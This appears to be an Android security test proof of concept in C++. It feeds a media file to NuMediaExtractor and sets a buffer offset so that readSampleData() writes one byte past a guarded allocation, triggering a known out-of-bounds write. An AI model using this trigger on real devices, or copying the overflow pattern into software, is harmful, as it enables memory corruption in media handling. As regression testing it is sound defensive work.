1 /*
2  * Copyright (C) 2023 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include <media/IMediaHTTPService.h>
18 #include <media/stagefright/NuMediaExtractor.h>
19 #include <media/stagefright/foundation/ABuffer.h>
20 #include <stdlib.h>
21 #include <vector>
22 #include "../includes/common.h"
23 #include "../includes/memutils.h"
24 
25 using namespace android;
26 
27 char enable_selective_overload = ENABLE_NONE;
28 
29 constexpr size_t kTrackIndex = 0;
30 
main(int argc,char ** argv)31 int main(int argc, char **argv) {
32     FAIL_CHECK(argc == 2);
33 
34     sp<NuMediaExtractor> extractor = new NuMediaExtractor(NuMediaExtractor::EntryPoint::OTHER);
35     FAIL_CHECK(extractor);
36 
37     extractor->setDataSource(nullptr /* httpService */, argv[1]);
38     extractor->selectTrack(kTrackIndex);
39     size_t sampleSize = -1;
40     extractor->getSampleSize(&sampleSize);
41     FAIL_CHECK(sampleSize != -1);
42 
43     enable_selective_overload = ENABLE_ALL;
44     std::vector<uint8_t> data(sampleSize);
45     enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
46     FAIL_CHECK(data.size() == sampleSize);
47 
48     sp<ABuffer> buffer = new ABuffer(data.data(), sampleSize);
49     FAIL_CHECK(buffer);
50 
51     // Setting the offset such that the buffer starts from the next byte after the last byte in the
52     // alignment in order to just write into the write protected region of the allocation.
53     // e.g. for a buffer of size 16 bytes,
54     // if 10 bytes are to be written
55     // then the offset should be 7 to cause an OOB write on the 17th byte.
56     size_t offset = MINIMUM_ALIGNMENT - (sampleSize % MINIMUM_ALIGNMENT) + 1;
57     size_t updatedSize = buffer->capacity() - offset;
58     buffer->setRange(offset, updatedSize);
59 
60     // Calling the vulnerable function readSampleData() here causes an OOB write.
61     extractor->readSampleData(buffer);
62     return EXIT_SUCCESS;
63 }
64